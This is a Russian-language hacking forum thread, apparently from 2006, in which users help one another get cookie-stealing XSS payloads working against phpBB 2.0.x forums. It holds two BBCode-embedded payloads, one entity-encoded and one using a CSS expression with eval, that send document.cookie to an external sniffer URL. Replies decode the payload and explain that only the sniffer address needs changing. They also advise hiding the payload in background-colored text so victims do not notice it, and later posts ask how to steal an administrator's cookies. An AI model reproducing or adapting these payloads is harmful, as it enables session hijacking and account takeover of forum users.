Форумы Exploit в phpbb 2.0.16

Discussion in 'Уязвимости CMS/форумов' started by {BuT@Min}, 1 Dec 2006.

  1. {BuT@Min}

    {BuT@Min} Elder - Старейшина

    Joined:
    23 Nov 2006
    Messages:
    43
    Likes Received:
    5
    Reputations:
    -1
    Code:
    [UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]
    и вот

    Code:
    [*color=#EFEFEF][*url]www.ut[*url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th  is.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
    Стоит phpbb 2.0.16 а вопрос заключается в следующем... как Exploit подготовить к работе??
    Ну насчёт первого мне интересна а где тама адрес снифера прописывать,а по поводу 2 я его испробывал но почему та куки не пришли(на себе испытавал ) :(
     
  2. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    Это XSS. в первом адрес снифера:
    #58;&+#117;&+#114;&+#108;&+#40;&+
    #106;&+#97;&+#118;&+#97;&+#115;&+#99;&+
    #114;&+#105;&+#112;&+#116;&+#58;&+#100;&+
    #111;&+#99;&+#117;&+#109;&+#101;&+#110;&+
    #116;&+#46;&+#105;&+#109;&+#97;&+#103;&+
    #101;&+#115;&+#91;&+#49;&+#93;&+#46;&+
    #115;&+#114;&+#99;&+#61;&+#34;&+#104;&+
    #116;&+#116;&+#112;&+#58;&+#47;&+#47;&+
    #97;&+#110;&+#116;&+#105;&+#99;&+#104;&+
    #97;&+#116;&+#46;&+#114;&+#117;&+#47;&+
    #99;&+#103;&+#105;&+#45;&+#98;&+#105;&+
    #110;&+#47;&+#115;&+#46;&+#106;&+#112;&+
    #103;&+#63;&+#34;+document.cookie

    А ты звездочки убирал?
     
    1 person likes this.
  3. {BuT@Min}

    {BuT@Min} Elder - Старейшина

    Joined:
    23 Nov 2006
    Messages:
    43
    Likes Received:
    5
    Reputations:
    -1
    Во втором?- да убирал

    Что то я не совсем понял и где этот снифер находится ... Заранее извиняюсь за глупые вопросы(может быть) :D
     
    #3 {BuT@Min}, 1 Dec 2006
    Last edited: 1 Dec 2006
  4. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    закодировано тут вот, что :url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie можешь воспользоваться декодером тут _http://webmastertools.narod.ru/OnlineTools/unicode_decode.html
     
    #4 злюка, 1 Dec 2006
    Last edited: 1 Dec 2006
  5. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    А вместо этого http://wj.com/ должен быть написан адрес форума с которого хочу стащить куки? И еще эти XSS на phpBB 2.0.13 прокатят?
     
    2 people like this.
  6. злюка

    злюка Elder - Старейшина

    Joined:
    11 Nov 2005
    Messages:
    337
    Likes Received:
    132
    Reputations:
    69
    ничего в этой XSS менять кроме адреса снифера не нужно...просто постишь на форуме и ловишь куки, помоему эта XSS катит до версии 2.0.18 (включая).
     
  7. {BuT@Min}

    {BuT@Min} Elder - Старейшина

    Joined:
    23 Nov 2006
    Messages:
    43
    Likes Received:
    5
    Reputations:
    -1
    Подписался на расылку снифера и нифига он что не шлёт --
    Вы имеете возможность получать на ваш e-mail логи сниффера в режиме реального времени. Отсылка лога в почтовый ящик происходит сразу, как только сниффер примет информацию.

    филтр на рефер указал в чём проблема?? :confused: (проверял заходил по хсс сам) как можна свой сниффер зделать????
     
    #7 {BuT@Min}, 1 Dec 2006
    Last edited: 1 Dec 2006
  8. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Может страничку с Xss которую ты создал еще никто не просмотрел и поэтому куки не пришли?
     
  9. Lorix

    Lorix New Member

    Joined:
    5 Dec 2006
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте. У меня есть к вам 2 вопроса
    1, Где можно скачать файлик и установить у тебя на хсоте чтобы он туда тянул кукисы
    2, Если поставить данный код в сообщение в топике то он вить будет отображся так сказать открытым. Тоесть как текст.
    И также будут видны надписи куки и урл.
    Как быть подскажите. Или я чтото не то делаю ?

    аська 491104
     
  10. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    1. Ищи на форуме по запросу "сниффер". Их тут много должно быть
    2. Перед и после кода XSS поставь тэги цвета фона форума. (точнее фона поста.)
    [c*olor=#RRGGBB]Здесь твоя ХССка[/c*olor]
    где RRGGBB - цвет в формате Red Green Blue.
    Твоя ХССка так и так будет открыта, но будет не видна в посте, и вряд ли ее заметят.
     
  11. Lorix

    Lorix New Member

    Joined:
    5 Dec 2006
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Там стоят два тега[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background:u&#

    Я так понемаю первый можно убрать
    [UR*L]http://www.
    и в конце тоже один.или этого делат нельзя?


    итакой вопрос ещё есть я вот хочю свой сниффер подставить. Где можно утилиту взять чтобы в unicode обратно переделать ?
     
    #11 Lorix, 6 Dec 2006
    Last edited: 6 Dec 2006
  12. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Как можно стырять куки если админ пользуется Оперой или Мозилой, форум phpbb 2.0.13?
     
Loading...